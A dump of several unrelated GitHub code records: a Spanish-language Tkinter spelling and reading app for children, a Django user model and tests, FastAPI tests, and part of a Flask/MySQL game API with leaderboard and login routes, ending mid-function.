perroylobo(self):\n webbrowser.open_new(\"https://www.guiainfantil.com/1358/cuento-infantil-pedro-y-el-lobo.html\")\n\n\n\n\n def open_sitio(self):\n webbrowser.open_new(\"https://jazmin-jazz.github.io/Liot---Literatura-y-ortograf-a-/\")\n \n def open_regla1(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFChFmpUjs/N2TXKAtjcCw8VKbMNw64Ww/view?utm_content=DAFChFmpUjs&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton\")\n \n def open_manual(self):\n webbrowser.open_new(\"https://issuu.com/carlos.giron2023/docs/manual_de_usuario\")\n \n def open_lectura1(self):\n webbrowser.open_new(\"https://www.canva.com/design/DAFNV7jERD0/Gh7hCkDQCksRGwbCgZvb-w/view?utm_content=DAFNV7jERD0&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton\")\n\n def pantalla_Quizzes(self):\n self.paginas.select([self.frame_cuatro])\t\n self.frame_cuatro.columnconfigure(0, weight=1)\n self.frame_cuatro.columnconfigure(1, weight=1)\n Button(self.frame_cuatro ,image= self.QuizzB, command = self.quizz_de_B,bg='white').place(x=20,y= 10)\n Button(self.frame_cuatro ,image= self.QuizzC, command = self.quizz_de_C, bg='white').place(x=320,y= 10)\n Button(self.frame_cuatro ,image= self.QuizzH, command = self.quizz_de_H, bg='white').place(x=620,y= 10)\n Button(self.frame_cuatro ,image= self.QuizzJ, command = self.quizz_de_J, bg='white').place(x=920,y= 10)\n Button(self.frame_cuatro ,image= self.QuizzS, command = self.quizz_de_S, bg='white').place(x=20,y= 320)\n Button(self.frame_cuatro ,image= self.QuizzV, command = self.quizz_de_V, bg='white').place(x=320,y= 320)\n Button(self.frame_cuatro ,image= self.QuizzY, command = self.quizz_de_Y, bg='white').place(x=620,y= 320)\n Button(self.frame_cuatro ,image= self.QuizzCom, command = self.quizz_de_Puntoycoma, bg='white').place(x=920,y= 320)\n \n#DONE#############################################################################################\n def quizz_de_B(self):\n webbrowser.open_new(\"https://forms.office.com/Pages/ResponsePage.aspx?id=RL3j2LoLa0KVLa2nuxc5PNVYNA_X4ohOjOWO2uRyZchUMFRMVVBXSDdIS1pYRjNGVTVTWDVFTzNDNy4u\")\n###DONE###############################################################################################\n def quizz_de_H(self):\n webbrowser.open_new(\"https://forms.office.com/Pages/ResponsePage.aspx?id=RL3j2LoLa0KVLa2nuxc5PNVYNA_X4ohOjOWO2uRyZchUREhSMzVRWVo4N0RVWDVJUzhETjRHTFM5RS4u\")\n####DONE##############################################################################################\n def quizz_de_C(self):\n webbrowser.open_new(\"https://forms.office.com/r/1GyZWYX6pZ\")\n###DONE############################################################################################### \n def quizz_de_J(self):\n webbrowser.open_new(\"https://forms.office.com/r/ADDan7emz9\")\n###DONE###############################################################################################\n def quizz_de_S(self):\n webbrowser.open_new(\"https://forms.office.com/r/1GyZWYX6pZ\")\n####DONE##############################################################################################\n def quizz_de_V(self):\n webbrowser.open_new(\"https://forms.office.com/r/7exV5dx7nW\")\n################################################################################################## \n def quizz_de_Y(self):\n webbrowser.open_new(\"https://forms.office.com/r/PwnbyDvvRy\")\n########done##########################################################################################\n def quizz_de_Puntoycoma(self):\n 
webbrowser.open_new(\"https://forms.office.com/r/M3YCN3PYbi\")\n##################################################################################################\n \n def pantalla_sitio(self):\n self.paginas.select([self.frame_cinco])\n self.frame_cinco.columnconfigure(0, weight=1)\n self.frame_cinco.columnconfigure(1, weight=1)\n self.frame_cinco.columnconfigure(2, weight=1)\n self.frame_cinco.rowconfigure(2, weight=1)\n Label(self.frame_cinco ,image= self.fondo, bg='white').place(x=0,y= 0)\n Label(self.frame_cinco ,image= self.nota, bg='white').place(x=200,y= 0)\n Label(self.frame_cinco ,image= self.logo3, bg='white').place(x=40,y=115)\n Label(self.frame_cinco ,image= self.nota3, bg='white').place(x=600,y=115)\n buttonIr=Button(self.frame_cinco, image= self.botonIr, bd=0, bg = \"white\", command= self.open_sitio)\n buttonIr.place(x=800, y=460)\n############################################################################################################################\n def pantalla_reglaY(self):\n self.paginas.select([self.frame_seis])\n\n next1 = leer_imagen(\"./img carrusel/next.png\",(60,60))\n privius = leer_imagen(\"./img carrusel/previous.png\",(60,60))\n regla_2 = leer_imagen(\"./Reglas/reglaY1.png\",(1100,620))\n regla_3 = leer_imagen(\"./Reglas/reglaY2.png\",(1100,620))\n regla_4 = leer_imagen(\"./Reglas/reglaY3.png\",(1100,620))\n regla_5 = leer_imagen(\"./Reglas/reglaY4.png\",(1100,620))\n regla_6 = leer_imagen(\"./Reglas/reglaY5.png\",(1100,620))\n regla_7 = leer_imagen(\"./Reglas/reglaY6.png\",(1100,620))\n regla_8 = leer_imagen(\"./Reglas/reglaY7.png\",(1100,620))\n regla_9 = leer_imagen(\"./Reglas/reglaY8.png\",(1100,620))\n regla_10 = leer_imagen(\"./Reglas/reglaY9.png\",(1100,620))\n regla_11 = leer_imagen(\"./Reglas/reglaY10.png\",(1100,620))\n regla_12 = leer_imagen(\"./Reglas/reglaY11.png\",(1100,620))\n\n lista_cuadros = [regla_2, regla_3, regla_4, regla_5, regla_6, regla_7, regla_8, regla_9, regla_10, regla_11, regla_12]\n\n def adelante(num_imagen):\n global label_pre\n global btn_adelante\n global btn_atras\n\n label_pre = Label(frame1,image=lista_cuadros[num_imagen], bg=\"white\")\n label_pre.place_forget()\n \n btn_atras = Button(frame_central,image=privius,bg=\"white\",bd=0,activebackground=\"white\", command=lambda: atras(num_imagen - 1))\n btn_adelante = Button(frame_central,image=next1, bg=\"white\",bd=0,activebackground=\"white\",command=lambda: adelante(num_imagen + 1))\n if num_imagen == 10:\n btn_adelante = Button(frame_central,image=next1, bg=\"white\",bd=0,activebackground=\"white\",state=DISABLED)\n\n label_pre.place(x=10,y=55)\n btn_atras.place(x=50,y=400)\n btn_adelante.place(x=1215,y=400)\n\n def atras(num_imagen):\n global label_pre\n global btn_adelante\n global btn_atras\n\n label_pre.place_forget()\n label_pre = Label(frame1,image=lista_cuadros[num_imagen], bg=\"white\")\n\n btn_atras = Button(frame_central,image=privius,bg=\"white\",bd=0,activebackground=\"white\", command=lambda: atras(num_imagen - 1))\n btn_adelante = Button(frame_central,image=next1, bg=\"white\",bd=0,activebackground=\"white\",command=lambda: adelante(num_imagen + 1))\n if num_imagen == 0:\n btn_atras = Button(frame_central,image=privius, bg=\"white\",bd=0,activebackground=\"white\",state=DISABLED)\n\n label_pre.place(x=10,y=55)\n btn_atras.place(x=50,y= 400)\n btn_adelante.place(x=1215,y=400)\n\n\n frame_central = Frame(self.frame_seis, height= 900, width=1355, bg=\"white\")\n frame_central.place(x=-60,y=-155)\n\n btn_atras = 
Button(frame_central,image=privius,bg=\"white\",bd=0,activebackground=\"white\", state=DISABLED)\n btn_atras.place(x=50,y= 400)\n btn_adelante = Button(frame_central,image=next1, bg=\"white\",bd=0,activebackground=\"white\",command=lambda: adelante(1))\n btn_adelante.place(x= 1215,y= 400)\n\n frame1 = Frame(frame_central, height=900, width=1120, bg=\"white\")\n frame1.place(x=100,y=90)\n label_pre = Label(frame1,image= regla_2, bg=\"white\")\n label_pre.place(x=10,y=55)\n\n\n########################################################################### \n def pantalla_ayuda2(self):\n self.paginas.select([self.frame_siete])\n self.frame_siete.columnconfigure(0, weight=1)\n self.frame_siete.columnconfigure(1, weight=1)\n self.frame_siete.columnconfigure(2, weight=1)\n self.frame_siete.rowconfigure(2, weight=1)\n Button(self.frame_siete ,image= self.manual1, bg='white', command=self.open_manual).place(x=60,y=10)\n Label(self.frame_siete ,text= \"Manual de usuario\", bg= 'white',font= ('Lucida Sans', 15)).place(x=95,y=270)\n Button(self.frame_siete ,image= self.manual2, bg='white', command=self.open_manual).place(x=360,y=10)\n Label(self.frame_siete ,text= \"Manual técnico\", bg= 'white',font= ('Lucida Sans', 15)).place(x=396,y=270)\n\n################################################################################################\n \n def pantalla_lectura(self):\n self.paginas.select([self.frame_ocho])\n\n next1 = leer_imagen(\"./img carrusel/next.png\",(60,60))\n privius = leer_imagen(\"./img carrusel/previous.png\",(60,60))\n foto_grup1 = leer_imagen(\"./img carrusel/img1.png\",(1100,620))\n img_2 = leer_imagen(\"./img carrusel/img2.png\",(1100,620))\n img_3 = leer_imagen(\"./img carrusel/img3.png\",(1100,620))\n img_4 = leer_imagen(\"./img carrusel/img4.png\",(1100,620))\n img_5 = leer_imagen(\"./img carrusel/img5.png\",(1100,620))\n img_6 = leer_imagen(\"./img carrusel/img6.png\",(1100,620))\n img_7 = leer_imagen(\"./img carrusel/img7.png\",(1100,620))\n\n lista_cuadros = [foto_grup1, img_2, img_3, img_4, img_5, img_6, img_7]\n\n def adelante(num_imagen):\n global label_pre\n global btn_adelante\n global btn_atras\n\n label_pre = Label(frame1,image=lista_cuadros[num_imagen], bg=\"white\")\n label_pre.place_forget()\n \n btn_atras = Button(frame_central,image=privius,bg=\"white\",bd=0,activebackground=\"white\", command=lambda: atras(num_imagen - 1))\n btn_adelante = Button(frame_central,image=next1, bg=\"white\",bd=0,activebackground=\"white\",command=lambda: adelante(num_imagen + 1))\n if num_imagen == 6:\n btn_adelante = Button(frame_central,image=next1, bg=\"white\",bd=0,activebackground=\"white\",state=DISABLED)\n\n label_pre.place(x=10,y=55)\n btn_atras.place(x=50,y=400)\n btn_adelante.place(x=1215,y=400)\n\n def atras(num_imagen):\n global label_pre\n global btn_adelante\n global btn_atras\n\n label_pre.place_forget()\n label_pre = Label(frame1,image=lista_cuadros[num_imagen], bg=\"white\")\n\n btn_atras = Button(frame_central,image=privius,bg=\"white\",bd=0,activebackground=\"white\", command=lambda: atras(num_imagen - 1))\n btn_adelante = Button(frame_central,image=next1, bg=\"white\",bd=0,activebackground=\"white\",command=lambda: adelante(num_imagen + 1))\n if num_imagen == 0:\n btn_atras = Button(frame_central,image=privius, bg=\"white\",bd=0,activebackground=\"white\",state=DISABLED)\n\n label_pre.place(x=10,y=55)\n btn_atras.place(x=50,y= 400)\n btn_adelante.place(x=1215,y=400)\n\n frame_central = Frame(self.frame_ocho, height= 900, width=1355, bg=\"white\")\n 
frame_central.place(x=-60,y=-155)\n\n btn_atras = Button(frame_central,image=privius,bg=\"white\",bd=0,activebackground=\"white\", state=DISABLED)\n btn_atras.place(x=50,y= 400)\n btn_adelante = Button(frame_central,image=next1, bg=\"white\",bd=0,activebackground=\"white\",command=lambda: adelante(1))\n btn_adelante.place(x= 1215,y= 400)\n\n frame1 = Frame(frame_central, height=900, width=1120, bg=\"white\")\n frame1.place(x=100,y=90)\n label_pre = Label(frame1,image=foto_grup1, bg=\"white\")\n label_pre.place(x=10,y=55)\n\n###################################################################################\n\n def menu_lateral(self):\n if self.menu is True:\n for i in range(50,170,10):\t\t\t\t\n self.frame_menu.config(width= i)\n self.frame_inicio.config(width= i)\n self.frame_menu.update()\n clik_inicio = self.bt_cerrar.grid_forget()\n if clik_inicio is None:\t\t\n self.bt_inicio.grid(column=0, row=0, padx =10, pady=10)\n self.bt_inicio.grid_propagate(0)\n self.bt_inicio.config(width=i)\n self.pantalla_inicial()\n self.menu = False\n else:\n for i in range(170,50,-10):\n self.frame_menu.config(width= i)\n self.frame_inicio.config(width= i)\n self.frame_menu.update()\n clik_inicio = self.bt_inicio.grid_forget()\n if clik_inicio is None:\n self.frame_menu.grid_propagate(0)\t\t\n self.bt_cerrar.grid(column=0, row=0, padx =10, pady=10)\n self.bt_cerrar.grid_propagate(0)\n self.bt_cerrar.config(width=i)\n self.pantalla_inicial()\n self.menu = True\n\n\n def widgets(self):\n self.imagen_inicio = PhotoImage(file ='inicio.png')\n self.imagen_menu = PhotoImage(file ='menu.png')\n self.imagen_cuenta = PhotoImage(file ='letras2.png')\n self.imagen_sitio = PhotoImage(file ='lecturas.png')\n self.imagen_config = PhotoImage(file ='quizz2.png')\n self.imagen_ayuda = PhotoImage(file ='sitio.png')\n self.imagen_ajustes = PhotoImage(file ='ayuda2.png')\n self.imagen_ayuda2 = PhotoImage(file ='ayuda2.png')\n #self.imagen_lectura = PhotoImage(file = 'letras.png')\n ###################################################################\n self.ReglaY = PhotoImage (file='uso y.png')\n self.ReglaB = PhotoImage (file='uso b.png')\n self.ReglaC = PhotoImage (file='uso c.png')\n self.ReglaH = PhotoImage (file='uso h.png')\n self.ReglaS = PhotoImage (file='uso s.png')\n self.ReglaV = PhotoImage (file='uso v.png')\n self.ReglaJ = PhotoImage (file='uso j.png')\n self.Reglapunt = PhotoImage (file='uso punco.png')\n #################################################################\n self.caperucita = PhotoImage (file='./img cuentos/caperucita.png')\n self.lectura2 = PhotoImage (file='./img cuentos/cerditos.png')\n self.lectura3 = PhotoImage (file='./img cuentos/gato.png')\n self.lectura4 = PhotoImage (file='./img cuentos/lobo.png')\n self.lectura5 = PhotoImage (file='./img cuentos/risitos.png')\n self.lectura6 = PhotoImage (file='./img cuentos/voz.png')\n self.lectura7 = PhotoImage (file='./img cuentos/perro.png')\n self.lectura8 = PhotoImage (file='./img cuentos/burro.png')\n #################################################################\n self.logo = PhotoImage(file ='portada.png')\n self.fondo = PhotoImage(file ='fondo.png')\n self.nota = PhotoImage(file ='nota.png')\n self.nota3 = PhotoImage(file ='nota3.png')\n self.logo3 = PhotoImage(file ='logo3.png')\n self.botonIr = PhotoImage(file ='ir.png')\n self.manual1 = PhotoImage(file ='manual1.png')\n self.manual2 = PhotoImage(file ='manual2.png')\n ##################################################################\n self.QuizzH = PhotoImage (file='quizz h.png')\n 
self.QuizzB = PhotoImage (file='quizz b.png')\n self.QuizzC = PhotoImage (file='quizz c.png')\n self.QuizzY = PhotoImage (file='Quizz Y.png')\n self.QuizzS = PhotoImage (file='quizz s.png')\n self.QuizzJ = PhotoImage (file='quizz j.png')\n self.QuizzV = PhotoImage (file='quizz v.png')\n self.QuizzCom = PhotoImage (file='quizz com.png')\n ##################################################################\n self.bt_inicio = Button(self.frame_inicio, image= self.imagen_inicio, bg='white',activebackground='white', bd=0, command = self.menu_lateral)\n self.bt_inicio.grid(column=0, row=0, padx=5, pady=10)\n self.bt_cerrar = Button(self.frame_inicio, image= self.imagen_menu, bg='white',activebackground='white', bd=0, command = self.menu_lateral)\n self.bt_cerrar.grid(column=0, row=0, padx=5, pady=10)\t\n\n #BOTONES Y ETIQUETAS DEL MENU LATERAL \n #Items y texto con fondo gris #ecf0f1\n Button(self.frame_menu, image= self.imagen_cuenta, bg='white', activebackground='white', bd=0, command = self.pantalla_reglas).grid(column=0, row=1, pady=20,padx=10)\n Button(self.frame_menu, image= self.imagen_sitio, bg='white',activebackground='white', bd=0, command = self.pantalla_Lecturas).grid(column=0, row=2, pady=20,padx=10)\n Button(self.frame_menu, image= self.imagen_config, bg= 'white',activebackground='white', bd=0, command = self.pantalla_Quizzes).grid(column=0, row=3, pady=20,padx=10)\n Button(self.frame_menu, image= self.imagen_ayuda, bg= 'white',activebackground='white', bd=0, command = self.pantalla_sitio).grid(column=0, row=4, pady=20,padx=10)\t\t\n #Button(self.frame_menu, image= self.imagen_ajustes, bg= '#ecf0f1',activebackground='#ecf0f1', bd=0, command = self.pantalla_reglaY).grid(column=0, row=5, pady=20,padx=10)\n Button(self.frame_menu, image= self.imagen_ayuda2, bg= 'white',activebackground='white', bd=0, command = self.pantalla_ayuda2).grid(column=0, row=5, pady=20,padx=10)\n\n Label(self.frame_menu, text= 'Reglas', bg= 'white', fg= '#666a88', font= ('Lucida Sans', 12, 'bold')).grid(column=1, row=1, pady=20, padx=2)\n Label(self.frame_menu, text= 'Lecturas', bg= 'white', fg= '#666a88', font= ('Lucida Sans', 12, 'bold')).grid(column=1, row=2, pady=20, padx=2)\n Label(self.frame_menu, text= 'Quizzes', bg= 'white', fg= '#666a88', font= ('Lucida Sans', 12, 'bold')).grid(column=1, row=3, pady=20, padx=2)\n Label(self.frame_menu, text= 'Sitio web', bg= 'white', fg= '#666a88', font= ('Lucida Sans', 12, 'bold')).grid(column=1, row=4, pady=20, padx=2)\t\n Label(self.frame_menu, text= 'Ayuda', bg= 'white', fg= '#666a88', font= ('Lucida Sans', 12, 'bold')).grid(column=1, row=5, pady=20, padx=2)\n #Label(self.frame_menu, text= '', bg= '#ecf0f1', fg= '#666a88', font= ('Lucida Sans', 12, 'bold')).grid(column=1, row=5, pady=20, padx=2)\n\n ############################# CREAR PÁGINAS ##############################\n \n estilo_paginas = ttk.Style()\n estilo_paginas.configure(\"TNotebook\", background='white', foreground='white', padding=0, borderwidth=0)\n estilo_paginas.theme_use('default')\n estilo_paginas.configure(\"TNotebook\", background='white', borderwidth=0)\n estilo_paginas.configure(\"TNotebook.Tab\", background=\"white\", borderwidth=0)\n estilo_paginas.map(\"TNotebook\", background=[(\"selected\", 'white')])\n estilo_paginas.map(\"TNotebook.Tab\", background=[(\"selected\", 'white')], foreground=[(\"selected\", 'white')]);\n\n #CREACCION DE LAS PAGINAS \n self.paginas = ttk.Notebook(self.frame_principal , style= 'TNotebook') #, style = 'TNotebook'\n self.paginas.grid(column=0,row=0, 
sticky='nsew')\n self.frame_uno = Frame(self.paginas, bg='white')\n self.frame_dos = Frame(self.paginas, bg='white')\n self.frame_tres = Frame(self.paginas, bg='white')\n self.frame_cuatro = Frame(self.paginas, bg='white')\n self.frame_cinco = Frame(self.paginas, bg='white')\n self.frame_seis = Frame(self.paginas, bg='white')\n self.frame_siete = Frame(self.paginas, bg='white')\n self.frame_ocho = Frame(self.paginas, bg='white')\n self.frame_quizz_h = Frame(self.paginas, bg='white')\n self.paginas.add(self.frame_uno)\n self.paginas.add(self.frame_dos)\n self.paginas.add(self.frame_tres)\n self.paginas.add(self.frame_cuatro)\n self.paginas.add(self.frame_cinco)\n self.paginas.add(self.frame_seis)\n self.paginas.add(self.frame_siete)\n self.paginas.add(self.frame_ocho)\n self.paginas.add(self.frame_quizz_h)\n\n ######################## FRAME TITULO #################\n #self.titulo = Label(self.frame_top,text= 'APLICACION DE ESCRITORIO EN PYTHON CON TKINTER', bg='white', fg= 'DarkOrchid1', font= ('Imprint MT Shadow', 15, 'bold'))\n #self.titulo.pack(expand=1)\n ######################## VENTANA PRINCIPAL #################\n #Label(self.frame_uno, text= 'Electrónica Programación y Tecnología', bg='DarkOrchid1', fg= 'white', font= ('Freehand521 BT', 20, 'bold')).pack(expand=1)\n Label(self.frame_uno ,image= self.logo, bg='white').place(x=0,y=-10)#.pack(expand=1)\n\n################################################################################\n if __name__ == \"__main__\":\n ventana = Tk()\n ventana.title('Liot')\n ventana.minsize(height= 650, width=1200)\n ventana.geometry('1000x500+180+80')\n ventana.call('wm', 'iconphoto', ventana._w, PhotoImage(file='lecturas.png'))\t\n app = Ventana(ventana)\n app.mainloop()","repo_name":"jimenanicole/App-Liot","sub_path":"LIOT1/unosolo.py","file_name":"unosolo.py","file_ext":"py","file_size_in_byte":32823,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"42679158325","text":"from django.contrib.auth.models import AbstractUser\nfrom django.core.validators import RegexValidator\nfrom django.db import models\n\n\nclass User(AbstractUser):\n\n class UserRoles(models.TextChoices):\n USER = 'user', ('User')\n MODERATOR = 'moderator', ('Moderator')\n ADMIN = 'admin', ('Admin')\n\n username = models.CharField(\n max_length=150,\n null=False,\n blank=False,\n unique=True,\n verbose_name='Имя пользователя',\n validators=[\n RegexValidator(\n regex=r'^[\\w.@+-]+$',\n message='Имя поля содержит недопустимый символ',\n )\n ]\n )\n email = models.EmailField(\n max_length=254,\n unique=True,\n blank=False,\n verbose_name='Адрес электронной почты'\n )\n first_name = models.CharField(\n max_length=150,\n blank=True,\n verbose_name='Имя'\n )\n last_name = models.CharField(\n max_length=150,\n blank=True,\n verbose_name='Фамилия'\n )\n date_joined = models.DateTimeField(\n auto_now_add=True,\n verbose_name='Время регистрации'\n )\n bio = models.TextField(\n blank=True,\n verbose_name='Дополнительная информация'\n )\n role = models.CharField(\n max_length=100,\n choices=UserRoles.choices,\n default=UserRoles.USER,\n verbose_name='Пользовательская роль (определяет права доступа)'\n )\n\n @property\n def is_moderator(self):\n return self.role == self.UserRoles.MODERATOR\n\n @property\n def is_admin(self):\n return (\n self.role == self.UserRoles.ADMIN\n or self.is_staff\n or self.is_superuser\n )\n\n class Meta:\n ordering = 
['username']\n","repo_name":"NECROshizo/YaMDb","sub_path":"api_yamdb/users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1442722807","text":"from django.test import TestCase\nfrom vehicles_demo.apps.vehicles.models import Customer, Vehicles\n\nclass TestSearch(TestCase):\n fixtures = [\n 'customers.json',\n 'vehicles.json'\n ]\n \n def setUp(self):\n self.customer = Customer.objects.first()\n\n def test_search_per_customer_name(self):\n response = self.client.get('/search/?customer_name={}'.format(self.customer.name))\n self.assertEquals(len(response.json()), self.customer.vehicles.all().count())\n \n def test_search_per_vehicle_status(self):\n response = self.client.get('/search/?online=true')\n self.assertEquals(len(response.json()), Vehicles.objects.filter(online=True).count())\n \n def test_search_per_vehicle_status_and_customer_name(self):\n response = self.client.get('/search/?online=true&customer_name={}'.format(self.customer.name))\n self.assertEquals(\n len(response.json()), \n Vehicles.objects.filter(\n online=True, \n customer__name__contains=self.customer.name\n ).count())","repo_name":"alpham/SwedQ-vehicle-task","sub_path":"backend/vehicles_demo/apps/vehicles/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"497074828","text":"import pytest\nfrom fastapi.testclient import TestClient\n\nfrom webapp import app\n\n\n@pytest.fixture()\ndef fastapi_client() -> TestClient:\n return TestClient(app)\n\n\ndef test_api_root(\n fastapi_client: TestClient,\n url_root: str,\n):\n response = fastapi_client.get(url_root)\n assert 200 == response.status_code\n assert \"Service is working\" in response.text\n\n\ndef test_api_predict(\n fastapi_client: TestClient,\n fake_test_dataset_json: str,\n url_predict: str,\n):\n data = {\"data\": fake_test_dataset_json}\n with fastapi_client:\n response = fastapi_client.get(url_predict, json=data)\n assert 200 == response.status_code\n preds = response.json()\n assert {0, 1} == set(preds)\n","repo_name":"made-ml-in-prod-2021/n0rdream","sub_path":"online_inference/tests/test_api_with_fastapi_client.py","file_name":"test_api_with_fastapi_client.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17342516474","text":"from flask import (Flask, Response, g,\n request, jsonify,\n abort, render_template)\nfrom redis import Redis\nfrom rq import Queue\nimport MySQLdb as mdb\nimport json\nimport numpy as np\nimport logging\n\nfrom process_session import process_session\nimport mysql_config as mc\n\nRACE_MODE_ID = 3\nHISTORY_LENGTH = 10\n\n#####################\n# Exp need to level #\n#####################\n# Lv.1 Lv.2 Lv.3 Lv.4 Lv.5 Lv.6 Lv.7 Lv.8 Lv.9\n_exp_needed = [10.0, 20.0, 30.0, 40.0, 80.0, 160.0, 320.0, 640.0, 1280.0]\n\napp = Flask(__name__)\n\n@app.before_request\ndef db_connect():\n g.db_con = mdb.connect('localhost', \n mc.mysql_username,\n mc.mysql_password,\n mc.mysql_database,\n charset='utf8')\n cur = g.db_con.cursor()\n cur.execute(\"SET NAMES utf8mb4\")\n\n@app.teardown_request\ndef db_disconnect(exception=None):\n db_con = getattr(g, 'db_con', None)\n if db_con is not None:\n db_con.commit()\n 
db_con.close()\n\n#########################################\n\n@app.route(\"/leaderboard\")\ndef leaderboard():\n try:\n con = g.db_con\n \n from datetime import date, timedelta\n today = date.today()\n monday = today - timedelta(days=today.weekday())\n next_monday = monday + timedelta(weeks=1);\n\n # get best weekly bps\n cur = con.cursor() \n cur.execute(\"\"\"\n SELECT t2.displayname, t2.level, COALESCE(MAX(t1.bps),0) AS max_bps\n FROM sessions AS t1, users AS t2\n WHERE t1.user_id = t2.user_id\n AND t1.mode_id = %s \n AND t1.added_on > %s\n AND t2.user_id = t2.linked_id\n GROUP BY t1.user_id\n ORDER BY max_bps DESC\n LIMIT 10\n \"\"\",(RACE_MODE_ID,monday))\n rows = cur.fetchall()\n users = []\n for i,row in enumerate(rows):\n rank = i+1\n username = row[0]\n level = row[1]\n bps = row[2]\n if username.startswith('FB_'):\n username = username[3:] + ' (FB)'\n elif username.startswith('PF_'):\n username = username[3:]\n\n # truncate string to 18 chars\n username = ((username[:18] + '...') if len(username) > 18 \n else username)\n\n users.append({'rank' : rank,\n 'username' : username,\n 'level' : level,\n 'bps' : \"%0.2f\"%bps})\n\n return render_template('leaderboard.html', \n users=users, \n reset=next_monday.strftime(\"%Y/%m/%d\"))\n except:\n app.logger.exception(\"An exception has been raised\")\n abort(400)\n\n#########################################\n\n@app.route(\"/userstats\", methods=['POST'])\ndef userstats():\n try:\n key = request.form['key'] \n if (key != mc.secret_key): abort(403)\n\n user_id = request.form['user_id']\n if int(user_id) == 0: \n return jsonify({'ERROR':1})\n\n con = g.db_con\n \n # get exp and level\n cur = con.cursor(cursorclass=mdb.cursors.DictCursor)\n cur.execute(\"\"\"\n SELECT experience,level,next_level_exp \n FROM users WHERE user_id=%s\"\"\",(user_id,))\n resp = cur.fetchone()\n\n if resp['level'] == 0:\n resp['this_level_exp'] = resp['experience']\n else:\n resp['this_level_exp'] = (resp['experience'] - \n np.sum(_exp_needed[:resp['level']]))\n \n # get best bps\n cur = con.cursor() \n cur.execute(\"\"\"\n SELECT COALESCE(MAX(bps),0) FROM sessions \n WHERE user_id=%s\n \"\"\",(user_id,))\n row = cur.fetchone()\n resp['best_bps'] = row[0]\n\n # get recent bps from race mode\n cur = con.cursor() \n cur.execute(\"\"\"\n SELECT bps FROM sessions \n WHERE user_id=%s\n ORDER BY session_id DESC\n LIMIT %s;\n \"\"\",(user_id,\n HISTORY_LENGTH))\n rows = cur.fetchall()\n resp['recent_bps'] = [row[0] for row in rows]\n resp['recent_bps'].reverse()\n\n return jsonify(resp)\n except:\n app.logger.exception(\"An exception has been raised\")\n return jsonify({'ERROR':1})\n\n\n#########################################\n\n@app.route(\"/annoucement\", methods=['POST'])\ndef annoucement():\n try:\n key = request.form['key'] \n if (key != mc.secret_key): abort(403)\n\n con = g.db_con\n cur = con.cursor(cursorclass=mdb.cursors.DictCursor) \n cur.execute(\"SELECT * FROM charsets WHERE hidden=0;\")\n\n resp = {}\n\n import time, datetime\n f = open(\"annoucement.txt\",\"r\")\n raw_text = f.readline()\n if raw_text:\n data = raw_text.split('::')\n if len(data) == 2:\n d = datetime.datetime.strptime(data[0],\"%m/%d/%Y\").date()\n timestamp = time.mktime(d.timetuple())\n resp = { 'annoucement' : data[1],\n 'timestamp' : timestamp}\n\n return jsonify(resp)\n except:\n app.logger.exception(\"An exception has been raised\")\n return jsonify({'ERROR':1})\n\n#########################################\n\n@app.route(\"/charsets\", methods=['POST'])\ndef charsets():\n try:\n key 
= request.form['key'] \n if (key != mc.secret_key): abort(403)\n\n con = g.db_con\n cur = con.cursor(cursorclass=mdb.cursors.DictCursor) \n cur.execute(\"SELECT * FROM charsets WHERE hidden=0;\")\n \n # [ {'charsetID' : int , \n # 'name' : string \n # 'character' : [] } ]\n resp = []\n rows = cur.fetchall()\n for row in rows:\n resp.append(\n { 'charsetID' : row['charset_id'],\n 'name' : row['charset_name'],\n 'characters' : json.loads(row['characters']) \n }\n )\n return Response(json.dumps(resp, \n ensure_ascii=False).encode('utf-8'))\n except:\n app.logger.exception(\"An exception has been raised\")\n return jsonify({'ERROR':1})\n\n#########################################\n\n@app.route(\"/protosets\", methods=['POST'])\ndef protosets():\n try:\n key = request.form['key']\n if (key != mc.secret_key): abort(403)\n\n user_id = request.form['user_id']\n\n con = g.db_con\n cur = con.cursor(cursorclass=mdb.cursors.DictCursor) \n\n # initialize with global protosets\n cur.execute(\"\"\"\n SELECT protoset_id, protoset_json FROM protosets \n WHERE user_id=%s;\n \"\"\", (-1,))\n\n resp = {}\n rows = cur.fetchall()\n for row in rows:\n protoset = json.loads(row['protoset_json'])\n label = protoset['label']\n protoset['protosetID'] = row['protoset_id']\n resp[label] = protoset\n \n # supplement with user-specific protosets\n cur.execute(\"\"\"\n SELECT protoset_id, protoset_json FROM protosets \n WHERE user_id=%s;\n \"\"\", (user_id,))\n\n rows = cur.fetchall()\n for row in rows:\n protoset = json.loads(row['protoset_json'])\n label = protoset['label']\n protoset['protosetID'] = row['protoset_id']\n resp[label] = protoset\n \n return Response(json.dumps(resp, \n ensure_ascii=False).encode('utf-8'))\n except:\n app.logger.exception(\"An exception has been raised\")\n return jsonify({'ERROR' : 1})\n \n#########################################\n\n@app.route(\"/newuser\", methods=['POST'])\ndef newuser():\n try:\n key = request.form['key']\n if (key != mc.secret_key): abort(403) \n\n username = request.form['username']\n fullname = request.form['fullname']\n email = request.form['email']\n \n con = g.db_con \n cur = con.cursor()\n cur.execute(\"\"\"\n INSERT INTO users\n (username, fullname, email, displayname, aliases) \n VALUES (%s,%s,%s,%s,%s);\n \"\"\", (username, fullname, email, username[3:], ''))\n\n resp = {}\n resp['user_id'] = con.insert_id()\n\n cur = con.cursor()\n cur.execute(\"\"\"\n UPDATE users \n SET linked_id=user_id\n WHERE user_id=%s;\n \"\"\", (resp['user_id'],))\n\n return jsonify(resp)\n\n except:\n app.logger.exception(\"An exception has been raised\")\n return jsonify({'user_id':0})\n\n#########################################\n\n@app.route(\"/login\", methods=['POST'])\ndef login():\n try:\n key = request.form['key']\n if (key != mc.secret_key): abort(403)\n\n username = request.form['username']\n\n con = g.db_con\n cur = con.cursor(cursorclass=mdb.cursors.DictCursor)\n cur.execute(\"SELECT user_id FROM users WHERE username=%s;\", \n (username,))\n\n resp = {}\n row = cur.fetchone()\n if row is None:\n resp['login_result'] = 